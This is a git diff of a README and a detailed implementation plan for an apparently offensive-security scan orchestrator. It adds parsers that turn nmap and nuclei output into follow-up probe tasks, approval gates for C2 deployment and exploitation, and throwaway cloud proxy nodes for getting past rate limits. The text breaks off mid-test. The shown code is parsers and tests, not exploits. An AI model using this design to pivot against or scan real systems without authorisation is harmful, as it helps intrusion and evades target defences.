diff --git a/README.md b/README.md
index a2a9994..2e895b3 100644
--- a/README.md
+++ b/README.md
@@ -21,12 +21,12 @@
 </p>
 
 <p align="center">
-  <img alt="Tests" src="https://img.shields.io/badge/tests-1157%20passing-brightgreen">
+  <img alt="Tests" src="https://img.shields.io/badge/tests-1350%2B%20passing-brightgreen">
   <img alt="Skills" src="https://img.shields.io/badge/skills-6-blue">
   <img alt="Tools" src="https://img.shields.io/badge/tools-50%2B-orange">
-  <img alt="Lines" src="https://img.shields.io/badge/lines-30K%20Python%20%7C%201.7K%20TypeScript-yellow">
+  <img alt="Lines" src="https://img.shields.io/badge/lines-33K%20Python%20%7C%201.7K%20TypeScript-yellow">
   <img alt="Platform" src="https://img.shields.io/badge/platform-Windows%20%7C%20Linux%20%7C%20macOS-0078D4">
-  <img alt="PRs" src="https://img.shields.io/badge/PRs-9%20merged-purple">
+  <img alt="PRs" src="https://img.shields.io/badge/PRs-10%20merged-purple">
 </p>
 
 ---
@@ -321,8 +321,11 @@ Target → TargetDetector → ScanPlanner → ScanEngine → Parsers → Pipelin
            │                  │              │ events    │          │ score
 ```
 
-- **Executors** — Shell, Docker, MCP server (connection-pooled)
+- **Executors** — Shell, Docker, MCP server (connection-pooled), Proxied Shell (ephemeral cloud proxy)
 - **DAG engine** — dependency-aware task dispatch with reactive edges (one tool's output triggers another)
+- **Dynamic mutation** — OutputAnalyzers extract structured intel from tool output, MutationStrategies inject new tasks into the DAG at runtime based on accumulated attack surface state (KillChainState)
+- **HITL approval gates** — dangerous tasks (C2 deployment, exploitation) pause for operator approval with configurable timeouts, durable persistence, and write-before-signal crash safety
+- **Ephemeral proxy routing** — high-throughput scans route through auto-provisioned cloud nodes (DigitalOcean, Vultr) for rate-limit resilience, with guaranteed teardown
 - **Normalization** — paths, CWEs, severities, titles standardized across tools
 - **Deduplication** — strict hash + fuzzy multi-pass matching across tools
 - **Correlation** — cross-finding relation detection, remediation grouping
@@ -384,7 +387,7 @@ A full-stack web interface for multi-user engagement management, built on FastAP
 /api/v1/exports/        Data export
 /api/v1/correlation/    Threat correlation
 /api/v1/chain/          Attack chain analysis
-/api/v1/scans/          Scan orchestration (CRUD, control, SSE streaming)
+/api/v1/scans/          Scan orchestration (CRUD, control, SSE, approval gates)
 /api/v1/system/         System info and health
 ```
 
@@ -460,11 +463,14 @@ opentools dashboard --engagement my-audit
 │    │                                                             │
 │    ├── engagement/ ── SQLite store (WAL, FTS5, migrations)       │
 │    ├── scanner/                                                  │
-│    │   ├── engine.py ──── DAG task executor                      │
+│    │   ├── engine.py ──── DAG task executor + mutation + gates    │
 │    │   ├── planner.py ── profile → task graph builder            │
 │    │   ├── pipeline.py ── normalize → dedup → correlate          │
 │    │   ├── parsing/ ── semgrep, gitleaks, trivy, nmap, generic   │
-│    │   ├── executor/ ── shell, docker, MCP                       │
+│    │   ├── executor/ ── shell, docker, MCP, proxied shell        │
+│    │   ├── mutation/ ── analyzers, strategies, kill chain state   │
+│    │   ├── infra/ ── cloud providers, proxy tunnel, sweeper      │
+│    │   ├── approval.py ── HITL gate registry                     │
 │    │   └── store.py ── scan-specific SQLite store                │
 │    ├── chain/                                                    │
 │    │   ├── extractors/ ── regex, parser-aware, LLM              │
@@ -670,7 +676,7 @@ python -m pytest tests/ -v
 ### Project Stats
 
 ```
-3 packages | 220+ source files | 1,150+ tests | 30K Python + 1.7K TypeScript | 9 PRs merged
+3 packages | 240+ source files | 1,350+ tests | 33K Python + 1.7K TypeScript | 10 PRs merged
 ```
 
 ### Tech Stack
@@ -775,6 +781,20 @@ The parser router auto-discovers parser modules — no registration needed.
 - [x] Web scan API with SSE streaming
 - [x] Performance optimization pass — batch DB writes, lazy fetching, reverse indexes, singleton stores
 
+### Phase 3.5: Reactive Engine Expansion
+
+- [x] Dynamic DAG mutation — OutputAnalyzer → KillChainState → MutationStrategy pipeline
+- [x] Nmap and Nuclei output analyzers for structured intel extraction
+- [x] RedisProbeStrategy — auto-pivot on discovered Redis services
+- [x] Ephemeral proxy routing — CloudNodeProvider ABC with DigitalOcean + Vultr
+- [x] Shielded teardown — guaranteed cloud node destruction even under cancellation
+- [x] ProxiedShellExecutor — transparent proxy routing for NETWORK_ISOLATED tasks
+- [x] Orphan node sweeper for startup cleanup of leaked infrastructure
+- [x] HITL approval gates — persistence-first, execution wrapper model
+- [x] ApprovalRegistry — in-memory notification hub with database-owned expiry
+- [x] FastAPI gate endpoints — list/approve/reject with write-before-signal guarantee
+- [x] Command injection guard for strategy-spawned tasks
+
 ### Phase 4 (Planned)
 
 - [ ] Attack chain visualization (linked findings → narrative graph)
diff --git a/docs/superpowers/plans/2026-04-13-dag-mutation-ephemeral-proxy.md b/docs/superpowers/plans/2026-04-13-dag-mutation-ephemeral-proxy.md
new file mode 100644
index 0000000..a3408bc
--- /dev/null
+++ b/docs/superpowers/plans/2026-04-13-dag-mutation-ephemeral-proxy.md
@@ -0,0 +1,2612 @@
+# Dynamic DAG Mutation + Ephemeral Proxy Routing Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Transform OpenTools from a static scan pipeline into a reactive execution engine that mutates its own DAG based on tool output, and optionally routes high-throughput scans through ephemeral proxy infrastructure for rate-limit resilience.
+
+**Architecture:** Two independent subsystems. Phase A adds a mutation layer (OutputAnalyzer → KillChainState → MutationStrategy) that hooks into the existing `ScanEngine._mark_completed` path — all synchronous within a single event loop turn, so no race conditions. Phase B adds an `AsyncContextManager`-based ephemeral proxy lifecycle that wraps `run_streaming` calls, with shielded teardown guaranteeing cloud node destruction even under cancellation. Both phases compose: a MutationStrategy can spawn tasks with `isolation: network_isolated`, and the ProxiedShellExecutor handles routing transparently.
+
+**Tech Stack:** Python 3.12+, Pydantic v2, asyncio, httpx (already in deps), pytest + pytest-asyncio
+
+---
+
+## File Structure
+
+### Phase A — Dynamic DAG Mutation
+
+| Action | Path | Responsibility |
+|--------|------|----------------|
+| Create | `packages/cli/src/opentools/scanner/mutation/__init__.py` | Package exports |
+| Create | `packages/cli/src/opentools/scanner/mutation/models.py` | `IntelBundle`, `DiscoveredService`, `DiscoveredVuln`, `KillChainState` |
+| Create | `packages/cli/src/opentools/scanner/mutation/analyzer.py` | `OutputAnalyzer` protocol + `NmapAnalyzer` + `NucleiAnalyzer` |
+| Create | `packages/cli/src/opentools/scanner/mutation/strategy.py` | `MutationStrategy` protocol + `RedisProbeStrategy` + `get_builtin_strategies()` |
+| Modify | `packages/cli/src/opentools/scanner/engine.py` | Add mutation fields to `__init__`, hook mutation into `_mark_completed`, harden `_inject_tasks` |
+| Create | `packages/cli/tests/test_scanner/test_mutation_models.py` | Tests for models |
+| Create | `packages/cli/tests/test_scanner/test_mutation_analyzer.py` | Tests for analyzers |
+| Create | `packages/cli/tests/test_scanner/test_mutation_strategy.py` | Tests for strategies |
+| Create | `packages/cli/tests/test_scanner/test_engine_mutation.py` | Integration: engine + mutation layer |
+
+### Phase B — Ephemeral Proxy Routing
+
+| Action | Path | Responsibility |
+|--------|------|----------------|
+| Modify | `packages/cli/src/opentools/shared/subprocess.py` | Add `env` parameter to `run_streaming` |
+| Create | `packages/cli/src/opentools/scanner/infra/__init__.py` | Package exports |
+| Create | `packages/cli/src/opentools/scanner/infra/provider.py` | `CloudNodeProvider` ABC, `EphemeralNode`, `ProvisioningError` |
+| Create | `packages/cli/src/opentools/scanner/infra/digitalocean.py` | `DigitalOceanProvider` (httpx-based) |
+| Create | `packages/cli/src/opentools/scanner/infra/proxy.py` | `ephemeral_proxy` context manager, `ProxyEndpoint`, `_shielded_destroy` |
+| Create | `packages/cli/src/opentools/scanner/infra/sweeper.py` | `sweep_orphaned_nodes` startup cleanup |
+| Create | `packages/cli/src/opentools/scanner/executor/proxied_shell.py` | `ProxiedShellExecutor` |
+| Modify | `packages/cli/src/opentools/scanner/executor/__init__.py` | Export `ProxiedShellExecutor` |
+| Modify | `packages/cli/tests/test_scanner/test_shared_subprocess.py` | Add `env` parameter test |
+| Create | `packages/cli/tests/test_scanner/test_infra_provider.py` | Tests for provider ABC + DO provider |
+| Create | `packages/cli/tests/test_scanner/test_infra_proxy.py` | Tests for proxy context manager + shielded teardown |
+| Create | `packages/cli/tests/test_scanner/test_executor_proxied_shell.py` | Tests for proxied executor |
+
+---
+
+## Phase A: Dynamic DAG Mutation
+
+### Task 1: KillChainState + IntelBundle Models
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/mutation/__init__.py`
+- Create: `packages/cli/src/opentools/scanner/mutation/models.py`
+- Test: `packages/cli/tests/test_scanner/test_mutation_models.py`
+
+- [ ] **Step 1: Write failing tests for IntelBundle and DiscoveredService**
+
+```python
+# packages/cli/tests/test_scanner/test_mutation_models.py
+"""Tests for mutation layer data models."""
+
+from opentools.scanner.mutation.models import (
+    DiscoveredService,
+    DiscoveredVuln,
+    IntelBundle,
+    KillChainState,
+)
+
+
+class TestDiscoveredService:
+    def test_construction(self):
+        svc = DiscoveredService(
+            host="10.0.0.1",
+            port=6379,
+            protocol="tcp",
+            service="redis",
+        )
+        assert svc.host == "10.0.0.1"
+        assert svc.port == 6379
+        assert svc.protocol == "tcp"
+        assert svc.service == "redis"
+        assert svc.product is None
+        assert svc.version is None
+
+    def test_with_product_and_version(self):
+        svc = DiscoveredService(
+            host="10.0.0.1",
+            port=80,
+            protocol="tcp",
+            service="http",
+            product="Apache httpd",
+            version="2.4.51",
+        )
+        assert svc.product == "Apache httpd"
+        assert svc.version == "2.4.51"
+
+
+class TestDiscoveredVuln:
+    def test_construction(self):
+        vuln = DiscoveredVuln(
+            host="10.0.0.1",
+            port=443,
+            template_id="CVE-2021-44228",
+            severity="critical",
+            matched_at="https://10.0.0.1:443/api",
+            extracted_data={"payload": "jndi:ldap"},
+        )
+        assert vuln.template_id == "CVE-2021-44228"
+        assert vuln.severity == "critical"
+
+    def test_port_optional(self):
+        vuln = DiscoveredVuln(
+            host="10.0.0.1",
+            port=None,
+            template_id="exposed-git",
+            severity="medium",
+            matched_at="http://10.0.0.1/.git/config",
+            extracted_data={},
+        )
+        assert vuln.port is None
+
+
+class TestIntelBundle:
+    def test_empty_default(self):
+        bundle = IntelBundle()
+        assert bundle.services == []
+        assert bundle.vulns == []
+        assert bundle.urls == []
+        assert bundle.metadata == {}
+
+    def test_with_services(self):
+        svc = DiscoveredService(
+            host="10.0.0.1", port=22, protocol="tcp", service="ssh",
+        )
+        bundle = IntelBundle(services=[svc])
+        assert len(bundle.services) == 1
+        assert bundle.services[0].service == "ssh"
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_models.py::TestDiscoveredService -v`
+Expected: FAIL with `ModuleNotFoundError: No module named 'opentools.scanner.mutation'`
+
+- [ ] **Step 3: Implement IntelBundle, DiscoveredService, DiscoveredVuln**
+
+```python
+# packages/cli/src/opentools/scanner/mutation/__init__.py
+"""Dynamic DAG mutation layer — output analysis, state accumulation, task synthesis."""
+```
+
+```python
+# packages/cli/src/opentools/scanner/mutation/models.py
+"""Data models for the mutation layer.
+
+IntelBundle carries structured intelligence extracted from tool output.
+KillChainState accumulates intel across all completed tasks, enabling
+cross-task reasoning for dynamic task injection.
+"""
+
+from __future__ import annotations
+
+from pydantic import BaseModel, Field
+
+
+class DiscoveredService(BaseModel):
+    """A network service discovered by a scanning tool."""
+    host: str
+    port: int
+    protocol: str              # "tcp" | "udp"
+    service: str               # e.g., "redis", "http", "ssh"
+    product: str | None = None # e.g., "Redis", "Apache httpd"
+    version: str | None = None # e.g., "6.2.7", "2.4.51"
+    banner: str | None = None
+
+
+class DiscoveredVuln(BaseModel):
+    """A vulnerability discovered by a scanning tool."""
+    host: str
+    port: int | None
+    template_id: str           # nuclei template ID or CVE
+    severity: str
+    matched_at: str            # URL or host:port
+    extracted_data: dict = Field(default_factory=dict)
+
+
+class IntelBundle(BaseModel):
+    """Structured intelligence extracted from a single task's output.
+
+    Produced by an OutputAnalyzer, consumed by KillChainState.ingest().
+    """
+    services: list[DiscoveredService] = Field(default_factory=list)
+    vulns: list[DiscoveredVuln] = Field(default_factory=list)
+    urls: list[str] = Field(default_factory=list)
+    metadata: dict = Field(default_factory=dict)
+
+
+class KillChainState(BaseModel):
+    """Accumulated attack surface knowledge across all completed tasks.
+
+    Only mutated inside ScanEngine._mark_completed (synchronous within
+    a single event loop turn), so no locking is needed.
+    """
+    services: dict[str, DiscoveredService] = Field(default_factory=dict)
+    vulns: dict[str, DiscoveredVuln] = Field(default_factory=dict)
+    urls: set[str] = Field(default_factory=set)
+    tasks_spawned: dict[str, int] = Field(default_factory=dict)
+    total_spawned: int = 0
+
+    def ingest(self, bundle: IntelBundle) -> None:
+        """Merge an IntelBundle into accumulated state. Deduplicates by key."""
+        for svc in bundle.services:
+            key = f"{svc.host}:{svc.port}/{svc.protocol}"
+            self.services[key] = svc
+        for vuln in bundle.vulns:
+            key = f"{vuln.host}:{vuln.template_id}"
+            self.vulns[key] = vuln
+        self.urls.update(bundle.urls)
+
+    def has_service(self, service_name: str) -> bool:
+        """Check if any discovered service matches the given name."""
+        return any(s.service == service_name for s in self.services.values())
+
+    def get_services(self, service_name: str) -> list[DiscoveredService]:
+        """Return all discovered services matching the given name."""
+        return [s for s in self.services.values() if s.service == service_name]
+
+    def record_spawn(self, strategy_name: str, count: int = 1) -> None:
+        """Record that a strategy spawned tasks."""
+        self.tasks_spawned[strategy_name] = (
+            self.tasks_spawned.get(strategy_name, 0) + count
+        )
+        self.total_spawned += count
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_models.py::TestDiscoveredService tests/test_scanner/test_mutation_models.py::TestDiscoveredVuln tests/test_scanner/test_mutation_models.py::TestIntelBundle -v`
+Expected: All PASS
+
+- [ ] **Step 5: Write failing tests for KillChainState**
+
+Add to `packages/cli/tests/test_scanner/test_mutation_models.py`:
+
+```python
+class TestKillChainState:
+    def test_empty_default(self):
+        state = KillChainState()
+        assert state.services == {}
+        assert state.vulns == {}
+        assert len(state.urls) == 0
+        assert state.total_spawned == 0
+
+    def test_ingest_services(self):
+        state = KillChainState()
+        bundle = IntelBundle(services=[
+            DiscoveredService(
+                host="10.0.0.1", port=6379, protocol="tcp", service="redis",
+            ),
+            DiscoveredService(
+                host="10.0.0.1", port=80, protocol="tcp", service="http",
+            ),
+        ])
+        state.ingest(bundle)
+        assert len(state.services) == 2
+        assert "10.0.0.1:6379/tcp" in state.services
+        assert "10.0.0.1:80/tcp" in state.services
+
+    def test_ingest_deduplicates(self):
+        state = KillChainState()
+        svc = DiscoveredService(
+            host="10.0.0.1", port=6379, protocol="tcp", service="redis",
+        )
+        state.ingest(IntelBundle(services=[svc]))
+        state.ingest(IntelBundle(services=[svc]))
+        assert len(state.services) == 1
+
+    def test_ingest_vulns(self):
+        state = KillChainState()
+        vuln = DiscoveredVuln(
+            host="10.0.0.1", port=443, template_id="CVE-2021-44228",
+            severity="critical", matched_at="https://10.0.0.1:443/",
+            extracted_data={},
+        )
+        state.ingest(IntelBundle(vulns=[vuln]))
+        assert "10.0.0.1:CVE-2021-44228" in state.vulns
+
+    def test_ingest_urls(self):
+        state = KillChainState()
+        state.ingest(IntelBundle(urls=["http://10.0.0.1/admin"]))
+        state.ingest(IntelBundle(urls=["http://10.0.0.1/admin", "http://10.0.0.1/api"]))
+        assert len(state.urls) == 2
+
+    def test_has_service(self):
+        state = KillChainState()
+        state.ingest(IntelBundle(services=[
+            DiscoveredService(
+                host="10.0.0.1", port=6379, protocol="tcp", service="redis",
+            ),
+        ]))
+        assert state.has_service("redis") is True
+        assert state.has_service("mysql") is False
+
+    def test_get_services(self):
+        state = KillChainState()
+        state.ingest(IntelBundle(services=[
+            DiscoveredService(host="10.0.0.1", port=6379, protocol="tcp", service="redis"),
+            DiscoveredService(host="10.0.0.2", port=6379, protocol="tcp", service="redis"),
+            DiscoveredService(host="10.0.0.1", port=80, protocol="tcp", service="http"),
+        ]))
+        redis_services = state.get_services("redis")
+        assert len(redis_services) == 2
+        assert all(s.service == "redis" for s in redis_services)
+
+    def test_record_spawn(self):
+        state = KillChainState()
+        state.record_spawn("redis_probe", 2)
+        assert state.tasks_spawned["redis_probe"] == 2
+        assert state.total_spawned == 2
+        state.record_spawn("redis_probe", 1)
+        assert state.tasks_spawned["redis_probe"] == 3
+        assert state.total_spawned == 3
+```
+
+- [ ] **Step 6: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_models.py -v`
+Expected: All PASS
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/mutation/__init__.py packages/cli/src/opentools/scanner/mutation/models.py packages/cli/tests/test_scanner/test_mutation_models.py
+git commit -m "feat(mutation): add IntelBundle, DiscoveredService, KillChainState models"
+```
+
+---
+
+### Task 2: OutputAnalyzer Protocol + NmapAnalyzer
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/mutation/analyzer.py`
+- Test: `packages/cli/tests/test_scanner/test_mutation_analyzer.py`
+
+**Context:** The existing `NmapParser` in `packages/cli/src/opentools/scanner/parsing/parsers/nmap.py` converts nmap XML into `RawFinding` objects for the findings pipeline. `NmapAnalyzer` converts the same XML into `DiscoveredService` objects for the mutation layer. Different output, different consumer — but same XML parsing logic.
+
+- [ ] **Step 1: Write failing tests for NmapAnalyzer**
+
+```python
+# packages/cli/tests/test_scanner/test_mutation_analyzer.py
+"""Tests for OutputAnalyzer implementations."""
+
+from opentools.scanner.mutation.analyzer import (
+    AnalyzerRegistry,
+    NmapAnalyzer,
+    NucleiAnalyzer,
+    OutputAnalyzer,
+)
+from opentools.scanner.mutation.models import IntelBundle
+
+
+# Minimal valid nmap XML with two open ports
+NMAP_XML_TWO_PORTS = """\
+<?xml version="1.0"?>
+<nmaprun>
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <hostnames><hostname name="target.local"/></hostnames>
+    <ports>
+      <port protocol="tcp" portid="6379">
+        <state state="open"/>
+        <service name="redis" product="Redis" version="6.2.7"/>
+      </port>
+      <port protocol="tcp" portid="80">
+        <state state="open"/>
+        <service name="http" product="Apache httpd" version="2.4.51"/>
+      </port>
+      <port protocol="tcp" portid="22">
+        <state state="closed"/>
+        <service name="ssh"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>"""
+
+NMAP_XML_NO_OPEN = """\
+<?xml version="1.0"?>
+<nmaprun>
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="80">
+        <state state="filtered"/>
+        <service name="http"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>"""
+
+NMAP_XML_MULTI_HOST = """\
+<?xml version="1.0"?>
+<nmaprun>
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="22">
+        <state state="open"/>
+        <service name="ssh"/>
+      </port>
+    </ports>
+  </host>
+  <host>
+    <address addr="10.0.0.2" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="3306">
+        <state state="open"/>
+        <service name="mysql" product="MySQL" version="8.0"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>"""
+
+
+class TestNmapAnalyzer:
+    def setup_method(self):
+        self.analyzer = NmapAnalyzer()
+
+    def test_tool_name(self):
+        assert self.analyzer.tool == "nmap"
+
+    def test_extracts_open_services(self):
+        bundle = self.analyzer.analyze(NMAP_XML_TWO_PORTS, "")
+        assert isinstance(bundle, IntelBundle)
+        assert len(bundle.services) == 2
+        services_by_port = {s.port: s for s in bundle.services}
+        assert 6379 in services_by_port
+        assert services_by_port[6379].service == "redis"
+        assert services_by_port[6379].product == "Redis"
+        assert services_by_port[6379].version == "6.2.7"
+        assert services_by_port[6379].host == "10.0.0.1"
+        assert 80 in services_by_port
+        assert services_by_port[80].service == "http"
+
+    def test_skips_closed_ports(self):
+        bundle = self.analyzer.analyze(NMAP_XML_TWO_PORTS, "")
+        ports = [s.port for s in bundle.services]
+        assert 22 not in ports
+
+    def test_no_open_ports_returns_empty(self):
+        bundle = self.analyzer.analyze(NMAP_XML_NO_OPEN, "")
+        assert bundle.services == []
+
+    def test_multi_host(self):
+        bundle = self.analyzer.analyze(NMAP_XML_MULTI_HOST, "")
+        assert len(bundle.services) == 2
+        hosts = {s.host for s in bundle.services}
+        assert hosts == {"10.0.0.1", "10.0.0.2"}
+
+    def test_invalid_xml_returns_empty(self):
+        bundle = self.analyzer.analyze("not xml at all", "")
+        assert bundle.services == []
+
+    def test_empty_stdout_returns_empty(self):
+        bundle = self.analyzer.analyze("", "")
+        assert bundle.services == []
+
+
+# Minimal nuclei JSON lines output
+NUCLEI_JSONL = (
+    '{"template-id":"CVE-2021-44228","host":"10.0.0.1","port":"443",'
+    '"matched-at":"https://10.0.0.1:443/api","info":{"severity":"critical"},'
+    '"extracted-results":["jndi:ldap"]}\n'
+    '{"template-id":"exposed-git","host":"10.0.0.1","port":"80",'
+    '"matched-at":"http://10.0.0.1/.git/config","info":{"severity":"medium"},'
+    '"extracted-results":[]}\n'
+)
+
+
+class TestNucleiAnalyzer:
+    def setup_method(self):
+        self.analyzer = NucleiAnalyzer()
+
+    def test_tool_name(self):
+        assert self.analyzer.tool == "nuclei"
+
+    def test_extracts_vulns(self):
+        bundle = self.analyzer.analyze(NUCLEI_JSONL, "")
+        assert len(bundle.vulns) == 2
+        template_ids = {v.template_id for v in bundle.vulns}
+        assert "CVE-2021-44228" in template_ids
+        assert "exposed-git" in template_ids
+
+    def test_vuln_fields(self):
+        bundle = self.analyzer.analyze(NUCLEI_JSONL, "")
+        cve = next(v for v in bundle.vulns if v.template_id == "CVE-2021-44228")
+        assert cve.host == "10.0.0.1"
+        assert cve.port == 443
+        assert cve.severity == "critical"
+        assert cve.matched_at == "https://10.0.0.1:443/api"
+
+    def test_extracts_urls_from_matched_at(self):
+        bundle = self.analyzer.analyze(NUCLEI_JSONL, "")
+        assert len(bundle.urls) == 2
+
+    def test_empty_output_returns_empty(self):
+        bundle = self.analyzer.analyze("", "")
+        assert bundle.vulns == []
+
+    def test_invalid_json_lines_skipped(self):
+        mixed = '{"template-id":"x","host":"h","matched-at":"u","info":{"severity":"low"}}\nnot json\n'
+        bundle = self.analyzer.analyze(mixed, "")
+        assert len(bundle.vulns) == 1
+
+
+class TestAnalyzerRegistry:
+    def test_register_and_get(self):
+        registry = AnalyzerRegistry()
+        analyzer = NmapAnalyzer()
+        registry.register(analyzer)
+        assert registry.get("nmap") is analyzer
+
+    def test_get_missing_returns_none(self):
+        registry = AnalyzerRegistry()
+        assert registry.get("nonexistent") is None
+
+    def test_get_builtin_analyzers(self):
+        registry = AnalyzerRegistry()
+        registry.register_builtins()
+        assert registry.get("nmap") is not None
+        assert registry.get("nuclei") is not None
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_analyzer.py::TestNmapAnalyzer::test_tool_name -v`
+Expected: FAIL with `ModuleNotFoundError`
+
+- [ ] **Step 3: Implement OutputAnalyzer protocol, NmapAnalyzer, NucleiAnalyzer, AnalyzerRegistry**
+
+```python
+# packages/cli/src/opentools/scanner/mutation/analyzer.py
+"""OutputAnalyzer protocol and builtin implementations.
+
+OutputAnalyzers extract structured attack surface intelligence from tool
+output.  They are distinct from ParserPlugin (which produces RawFinding
+objects for the findings pipeline) — analyzers produce IntelBundle objects
+for the mutation layer's KillChainState.
+"""
+
+from __future__ import annotations
+
+import json
+import xml.etree.ElementTree as ET
+from typing import Protocol, runtime_checkable
+
+from opentools.scanner.mutation.models import (
+    DiscoveredService,
+    DiscoveredVuln,
+    IntelBundle,
+)
+
+
+@runtime_checkable
+class OutputAnalyzer(Protocol):
+    """Extracts attack surface intelligence from raw tool output."""
+    tool: str
+
+    def analyze(self, stdout: str, stderr: str) -> IntelBundle: ...
+
+
+class NmapAnalyzer:
+    """Extract DiscoveredService objects from nmap XML output."""
+    tool = "nmap"
+
+    def analyze(self, stdout: str, stderr: str) -> IntelBundle:
+        if not stdout.strip():
+            return IntelBundle()
+
+        try:
+            root = ET.fromstring(stdout)
+        except ET.ParseError:
+            return IntelBundle()
+
+        services: list[DiscoveredService] = []
+
+        for host in root.findall("host"):
+            addr_el = host.find("address")
+            addr = addr_el.get("addr", "unknown") if addr_el is not None else "unknown"
+
+            ports_el = host.find("ports")
+            if ports_el is None:
+                continue
+
+            for port in ports_el.findall("port"):
+                state_el = port.find("state")
+                if state_el is None or state_el.get("state") != "open":
+                    continue
+
+                svc_el = port.find("service")
+                services.append(DiscoveredService(
+                    host=addr,
+                    port=int(port.get("portid", "0")),
+                    protocol=port.get("protocol", "tcp"),
+                    service=svc_el.get("name", "") if svc_el is not None else "",
+                    product=svc_el.get("product") if svc_el is not None else None,
+                    version=svc_el.get("version") if svc_el is not None else None,
+                ))
+
+        return IntelBundle(services=services)
+
+
+class NucleiAnalyzer:
+    """Extract DiscoveredVuln objects from nuclei JSON-lines output."""
+    tool = "nuclei"
+
+    def analyze(self, stdout: str, stderr: str) -> IntelBundle:
+        if not stdout.strip():
+            return IntelBundle()
+
+        vulns: list[DiscoveredVuln] = []
+        urls: list[str] = []
+
+        for line in stdout.strip().splitlines():
+            line = line.strip()
+            if not line:
+                continue
+            try:
+                data = json.loads(line)
+            except json.JSONDecodeError:
+                continue
+
+            template_id = data.get("template-id", "")
+            host = data.get("host", "")
+            matched_at = data.get("matched-at", "")
+            info = data.get("info", {})
+            severity = info.get("severity", "unknown") if isinstance(info, dict) else "unknown"
+
+            port_raw = data.get("port", "")
+            port: int | None = None
+            if port_raw:
+                try:
+                    port = int(port_raw)
+                except (ValueError, TypeError):
+                    pass
+
+            extracted = data.get("extracted-results", [])
+            extracted_data = {"results": extracted} if extracted else {}
+
+            vulns.append(DiscoveredVuln(
+                host=host,
+                port=port,
+                template_id=template_id,
+                severity=severity,
+                matched_at=matched_at,
+                extracted_data=extracted_data,
+            ))
+
+            if matched_at:
+                urls.append(matched_at)
+
+        return IntelBundle(vulns=vulns, urls=urls)
+
+
+class AnalyzerRegistry:
+    """Registry of OutputAnalyzer instances, keyed by tool name."""
+
+    def __init__(self) -> None:
+        self._analyzers: dict[str, OutputAnalyzer] = {}
+
+    def register(self, analyzer: OutputAnalyzer) -> None:
+        self._analyzers[analyzer.tool] = analyzer
+
+    def get(self, tool: str) -> OutputAnalyzer | None:
+        return self._analyzers.get(tool)
+
+    def register_builtins(self) -> None:
+        """Register all builtin analyzers."""
+        self.register(NmapAnalyzer())
+        self.register(NucleiAnalyzer())
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_analyzer.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/mutation/analyzer.py packages/cli/tests/test_scanner/test_mutation_analyzer.py
+git commit -m "feat(mutation): add OutputAnalyzer protocol with Nmap and Nuclei analyzers"
+```
+
+---
+
+### Task 3: MutationStrategy Protocol + RedisProbeStrategy
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/mutation/strategy.py`
+- Test: `packages/cli/tests/test_scanner/test_mutation_strategy.py`
+
+**Context:** Strategies examine the accumulated `KillChainState` (not just one task's output) and synthesize new `ScanTask` objects. Each strategy is idempotent — it tracks what it has already spawned via task ID conventions to avoid duplicates.
+
+- [ ] **Step 1: Write failing tests for MutationStrategy and RedisProbeStrategy**
+
+```python
+# packages/cli/tests/test_scanner/test_mutation_strategy.py
+"""Tests for MutationStrategy implementations."""
+
+from opentools.scanner.mutation.models import (
+    DiscoveredService,
+    IntelBundle,
+    KillChainState,
+)
+from opentools.scanner.mutation.strategy import (
+    MutationStrategy,
+    RedisProbeStrategy,
+    get_builtin_strategies,
+)
+from opentools.scanner.models import ScanTask, TaskType, ExecutionTier
+
+
+def _make_task(
+    task_id: str = "nmap-1",
+    tool: str = "nmap",
+    scan_id: str = "scan-1",
+) -> ScanTask:
+    return ScanTask(
+        id=task_id,
+        scan_id=scan_id,
+        name=f"{tool}-task",
+        tool=tool,
+        task_type=TaskType.SHELL,
+    )
+
+
+def _state_with_redis() -> KillChainState:
+    state = KillChainState()
+    state.ingest(IntelBundle(services=[
+        DiscoveredService(
+            host="10.0.0.1", port=6379, protocol="tcp", service="redis",
+            product="Redis", version="6.2.7",
+        ),
+    ]))
+    return state
+
+
+def _state_with_http_only() -> KillChainState:
+    state = KillChainState()
+    state.ingest(IntelBundle(services=[
+        DiscoveredService(
+            host="10.0.0.1", port=80, protocol="tcp", service="http",
+        ),
+    ]))
+    return state
+
+
+class TestRedisProbeStrategy:
+    def setup_method(self):
+        self.strategy = RedisProbeStrategy()
+
+    def test_name(self):
+        assert self.strategy.name == "redis_probe"
+
+    def test_max_spawns(self):
+        assert self.strategy.max_spawns == 10
+
+    def test_spawns_redis_probe_when_redis_discovered(self):
+        state = _state_with_redis()
+        task = _make_task(tool="nmap")
+        new_tasks = self.strategy.evaluate(state, "scan-1", task)
+        assert len(new_tasks) == 1
+        t = new_tasks[0]
+        assert t.tool == "redis-cli"
+        assert t.task_type == TaskType.DOCKER_EXEC
+        assert "10.0.0.1" in t.command
+        assert "6379" in t.command
+        assert t.scan_id == "scan-1"
+        assert t.spawned_by == "nmap-1"
+        assert "redis" in t.spawned_reason.lower()
+
+    def test_no_spawn_when_no_redis(self):
+        state = _state_with_http_only()
